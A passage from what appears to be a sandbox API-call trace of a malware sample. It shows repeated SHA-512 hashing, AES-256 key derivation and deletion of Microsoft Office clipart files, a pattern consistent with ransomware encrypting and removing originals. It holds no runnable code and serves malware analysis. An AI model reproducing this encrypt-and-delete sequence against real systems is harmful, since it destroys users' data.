office\\root\\clipart\\pub60cor\\fd01074_.wmf")) returned 1 [0200.533] CryptDestroyKey (hKey=0x9ad678) returned 1 [0200.533] wcslen (_String="OK") returned 0x2 [0200.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.533] CryptDestroyKey (hKey=0x9ad778) returned 1 [0200.533] CryptDestroyHash (hHash=0x9ad238) returned 1 [0200.533] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0200.535] CryptCreateHash (in: hProv=0x8e3908, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0200.535] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.535] CryptDeriveKey (in: hProv=0x8e3908, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad2f8) returned 1 [0200.535] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.535] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.535] wcslen (_String="\\\\?\\") returned 0x4 [0200.539] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 1 [0200.539] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf")) returned 1 [0200.540] CryptDestroyKey (hKey=0x9ad738) returned 1 [0200.540] wcslen (_String="OK") returned 0x2 [0200.540] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.540] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.540] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0200.540] CryptDestroyHash (hHash=0x9ad378) returned 1 [0200.540] CryptReleaseContext (hProv=0x8e3908, dwFlags=0x0) returned 1 [0200.542] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0200.542] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.542] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad278) returned 1 [0200.542] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.542] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.542] wcslen (_String="\\\\?\\") returned 0x4 [0200.546] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 1 [0200.546] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf")) returned 1 [0200.547] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0200.547] wcslen (_String="OK") returned 0x2 [0200.547] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.547] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.547] CryptDestroyKey (hKey=0x9ad278) returned 1 [0200.547] CryptDestroyHash (hHash=0x9ad238) returned 1 [0200.547] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0200.549] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0200.549] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.549] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad578) returned 1 [0200.549] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.549] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.549] wcslen (_String="\\\\?\\") returned 0x4 [0200.627] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 1 [0200.627] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf")) returned 1 [0200.628] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0200.628] wcslen (_String="OK") returned 0x2 [0200.628] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.628] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.629] CryptDestroyKey (hKey=0x9ad578) returned 1 [0200.629] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0200.629] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0200.631] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0200.631] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.631] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad8b8) returned 1 [0200.631] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.631] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.631] wcslen (_String="\\\\?\\") returned 0x4 [0200.635] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 1 [0200.636] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf")) returned 1 [0200.637] CryptDestroyKey (hKey=0x9ad638) returned 1 [0200.637] wcslen (_String="OK") returned 0x2 [0200.637] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.637] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.637] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0200.637] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0200.637] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0200.640] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0200.640] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.640] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad478) returned 1 [0200.640] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.640] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.640] wcslen (_String="\\\\?\\") returned 0x4 [0200.656] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 1 [0200.656] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf")) returned 1 [0200.657] CryptDestroyKey (hKey=0x9ad238) returned 1 [0200.657] wcslen (_String="OK") returned 0x2 [0200.657] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.657] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.657] CryptDestroyKey (hKey=0x9ad478) returned 1 [0200.657] CryptDestroyHash (hHash=0x9ad438) returned 1 [0200.657] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0200.660] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0200.660] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.660] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad838) returned 1 [0200.660] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.660] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.660] wcslen (_String="\\\\?\\") returned 0x4 [0200.672] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 1 [0200.672] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf")) returned 1 [0200.674] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.674] wcslen (_String="OK") returned 0x2 [0200.674] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.674] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.674] CryptDestroyKey (hKey=0x9ad838) returned 1 [0200.674] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0200.674] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0200.676] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0200.676] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.676] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad478) returned 1 [0200.676] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.676] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.676] wcslen (_String="\\\\?\\") returned 0x4 [0200.684] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 1 [0200.684] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf")) returned 1 [0200.685] CryptDestroyKey (hKey=0x9ad178) returned 1 [0200.685] wcslen (_String="OK") returned 0x2 [0200.685] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.685] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.686] CryptDestroyKey (hKey=0x9ad478) returned 1 [0200.686] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0200.686] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0200.688] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0200.688] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.688] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad178) returned 1 [0200.688] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.688] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.688] wcslen (_String="\\\\?\\") returned 0x4 [0200.699] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 1 [0200.699] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf")) returned 1 [0200.701] CryptDestroyKey (hKey=0x9ad538) returned 1 [0200.701] wcslen (_String="OK") returned 0x2 [0200.701] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.701] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.701] CryptDestroyKey (hKey=0x9ad178) returned 1 [0200.701] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0200.701] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0200.703] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0200.703] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.703] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad338) returned 1 [0200.703] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.703] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.703] wcslen (_String="\\\\?\\") returned 0x4 [0200.751] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 1 [0200.751] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf")) returned 1 [0200.752] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0200.752] wcslen (_String="OK") returned 0x2 [0200.752] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.752] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.752] CryptDestroyKey (hKey=0x9ad338) returned 1 [0200.752] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0200.752] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0200.755] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0200.755] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.755] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad138) returned 1 [0200.755] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.755] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.755] wcslen (_String="\\\\?\\") returned 0x4 [0200.766] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 1 [0200.766] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf")) returned 1 [0200.767] CryptDestroyKey (hKey=0x9ad678) returned 1 [0200.767] wcslen (_String="OK") returned 0x2 [0200.767] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.767] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.767] CryptDestroyKey (hKey=0x9ad138) returned 1 [0200.767] CryptDestroyHash (hHash=0x9ad878) returned 1 [0200.767] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0200.769] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0200.769] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.769] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad6b8) returned 1 [0200.769] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.769] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.769] wcslen (_String="\\\\?\\") returned 0x4 [0200.772] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 1 [0200.772] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf")) returned 1 [0200.773] CryptDestroyKey (hKey=0x9ad138) returned 1 [0200.773] wcslen (_String="OK") returned 0x2 [0200.773] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.773] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.773] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0200.773] CryptDestroyHash (hHash=0x9ad438) returned 1 [0200.773] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0200.775] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0200.775] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.775] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad578) returned 1 [0200.775] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.775] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.775] wcslen (_String="\\\\?\\") returned 0x4 [0200.778] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 1 [0200.778] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf")) returned 1 [0200.779] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0200.779] wcslen (_String="OK") returned 0x2 [0200.779] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.779] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.779] CryptDestroyKey (hKey=0x9ad578) returned 1 [0200.779] CryptDestroyHash (hHash=0x9ad478) returned 1 [0200.779] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0200.781] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0200.781] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.781] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad5b8) returned 1 [0200.781] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.781] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.781] wcslen (_String="\\\\?\\") returned 0x4 [0200.788] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 1 [0200.788] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf")) returned 1 [0200.789] CryptDestroyKey (hKey=0x9ad378) returned 1 [0200.789] wcslen (_String="OK") returned 0x2 [0200.789] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.789] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.789] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0200.789] CryptDestroyHash (hHash=0x9ad178) returned 1 [0200.789] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0200.790] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0200.790] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.790] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad4b8) returned 1 [0200.790] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.790] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.790] wcslen (_String="\\\\?\\") returned 0x4 [0200.793] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 1 [0200.793] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf")) returned 1 [0200.794] CryptDestroyKey (hKey=0x9ad438) returned 1 [0200.794] wcslen (_String="OK") returned 0x2 [0200.794] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.794] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.794] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.794] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0200.794] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0200.796] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0200.796] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.796] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad5f8) returned 1 [0200.796] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.796] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.796] wcslen (_String="\\\\?\\") returned 0x4 [0200.831] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 1 [0200.832] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf")) returned 1 [0200.832] CryptDestroyKey (hKey=0x9ad738) returned 1 [0200.832] wcslen (_String="OK") returned 0x2 [0200.833] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.833] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.833] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0200.833] CryptDestroyHash (hHash=0x9ad338) returned 1 [0200.833] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0200.834] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0200.834] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.834] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad738) returned 1 [0200.834] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.834] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.834] wcslen (_String="\\\\?\\") returned 0x4 [0200.876] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 1 [0200.876] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf")) returned 1 [0200.878] CryptDestroyKey (hKey=0x9ad778) returned 1 [0200.878] wcslen (_String="OK") returned 0x2 [0200.878] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.878] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.878] CryptDestroyKey (hKey=0x9ad738) returned 1 [0200.878] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0200.878] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0200.903] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0200.903] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.903] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad378) returned 1 [0200.903] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.903] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.903] wcslen (_String="\\\\?\\") returned 0x4 [0200.939] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 1 [0200.939] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf")) returned 1 [0200.940] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.940] wcslen (_String="OK") 